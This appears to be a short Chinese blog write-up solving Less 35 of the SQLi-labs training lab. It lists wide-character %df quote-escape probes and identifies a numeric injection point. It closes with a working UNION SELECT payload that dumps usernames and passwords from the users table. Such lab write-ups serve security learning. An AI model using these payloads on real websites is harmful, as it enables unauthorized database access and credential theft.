Sqli labs less 35
2021-09-10 18:19:32

本less的考點是數(shù)值型注入

1.常規(guī)方法測試，提示無報錯但1被轉(zhuǎn)義

?

?

?2.同上利用寬字符進行注釋測試%df

?id=1%df'--+
?id=1%df')--+
?id=1%df'))--+
?id=1%df"--+
?id=1%df")--+
?id=1%df"))--+

?

3.直接用 ORDER BY 排序，網(wǎng)頁回顯正常數(shù)據(jù)，確定是數(shù)值型注入。由于數(shù)值型注入不涉及任何編碼問題，因此轉(zhuǎn)義操作都沒作用。

?

?4.爆出用戶名密碼：?id=-1 UNION SELECT 1,group_concat(concat_ws(0x3a,username,password)),3 FROM security.users--+

.

?